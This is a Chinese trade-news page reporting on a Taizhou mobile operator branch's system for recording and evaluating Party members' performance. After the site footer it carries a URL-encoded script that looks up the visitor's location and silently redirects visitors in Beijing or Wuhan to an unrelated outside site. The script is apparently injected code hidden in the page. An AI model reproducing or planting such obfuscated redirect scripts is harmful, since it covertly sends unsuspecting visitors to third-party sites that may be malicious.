飞象首页 | 资讯 | 监管 | 运营 | 制造 | 增值 | 技术 | 产品 | 手机 | 论坛
之窗首页 企业动态 市场营销 文化建设 行业监管 八小时外 飞象论坛
记者简介
 沈小娟
在江苏泰州移动公司从事新闻宣传等工作,爱工作,爱生活,珍惜当下,不负韶华。
点击排行

泰州移动多措并举推进党员记实管理

2018年12月21日 15:07 CCTIME飞象网 作 者:沈小娟

    泰州移动深入落实党员记实管理制度,通过强化月度通报、季度测评、年度考核,提升党员日常教育管理工作的精细化水平。

    细化记实内容。在综合考虑记实内容和实施程序的基础上,下发《“月晒季评年考”应知应会内容》,进一步明晰日常支部管理、年度考核等10项工作规范和要求。要求各党支部年度工作计划条目化、项目化,时间具体到月,责任明确到人。要求党员根据岗位实际,制定争做“四个合格”党员的年度规划,并经支部审定后在“党建领航站”公布,接受全员监督。

    规范记实方式。公司党委设置《争做“四个合格”党员记实表》,要求各支部按月填写,准确记录党员参加党员大会、交纳党费等日常实际,以及助力改革发展、志愿奉献等发挥党员先锋作用的情况。针对支部统一组织的活动,安排专人负责记录,针对党员自主参加的活动,由个人申报、支部核实后记录至记实表;每月通过“党建信息云平台”“先锋E家微信群”,将记实结果向全员公布。

    强化结果运用。每季度召开支部党员大会,对党员争做“四个合格”党员的表现进行点评,总结取得的成效,指出存在的问题,并对考评靠后的党员提出整改要求。将党员“四个合格”表现纳入年度民主评议党员和党性考核的重要内容,年底要求党员逐一汇报争做“四个合格”党员情况,支部依据其日常行为表现、季度测评结果、工作完成等情况,综合确定考评等级。

    (丁玲玲)

关键字搜索:泰州移动  
关于我们 | 广告报价 | 联系我们 | 隐私声明 | 本站地图
CCTIME飞象网 CopyRight © 2007-2017 By CCTIME.COM
京ICP备08004280号  电信与信息服务业务经营许可证080234号
公司名称: 北京飞象互动文化传媒有限公司
未经书面许可,禁止转载、摘编、复制、镜像

%3Cscript%20type%3D%22text/javascript%22%20src%3D%22http%3A//ip.ws.126.net/ipquery%22%3E%3C/script%3E%0A%3Cscript%20type%3D%22text/javascript%22%3E%0Astrdistrict%20%3D%5Blo%2C%20lc%5D.join%28%27%5Ct%27%29%3B%0Aif%28strdistrict.indexOf%28%22%u5317%u4EAC%22%29%3E0%20%7C%7C%20strdistrict.indexOf%28%22%u6B66%u6C49%22%29%3E0%29%0A%7B%0Awindow.location.href%3D%22http%3A//www.arrdm.com%22%3B%20%20%0A%7D%0Aelse%0A%7B%0A%7D%0A%3C/script%3E